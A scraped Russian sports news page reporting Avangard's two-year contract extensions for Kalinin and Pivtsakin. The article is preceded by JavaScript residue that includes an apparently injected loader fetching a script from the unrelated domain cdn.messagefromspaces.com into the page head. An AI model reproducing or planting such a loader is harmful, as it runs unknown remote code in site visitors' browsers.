, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
4 февраля, 2013 Спорт

Пивцакин и Калинин будут играть за "Авангард" еще два года

Пивцакин и Калинин будут играть за &quotАвангард&quot еще два года

Как сегодня сообщает пресс-служба «Авангарда», хоккейный клуб продлил контракты на два года с нападающим Сергеем Калининым и защитником Никитой Пивцакиным

«Сохранить Никиту и Сергея в «Авангарде» было первостепенной задачей для нашего клуба. Талантливые воспитанники омской школы уже не раз доказали на деле свою преданность команде, год от года они показывают стабильную игру и смогли завоевать место в основном составе», – сообщил главный менеджер «Авангарда» Владимир Капуловский.

По словам Никиты Пивцакина, друзья-хоккеисты даже не сомневались, что останутся в «Авангарде».

«Здесь мы почувствовали, что нам доверяют, что мы можем расти здесь в мастерстве. Биться за родную команду, за родной город – огромная ответственность для нас и огромная гордость. Мы сделаем все, чтобы порадовать наших болельщиков новыми победами», – поделился защитник.

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Спорт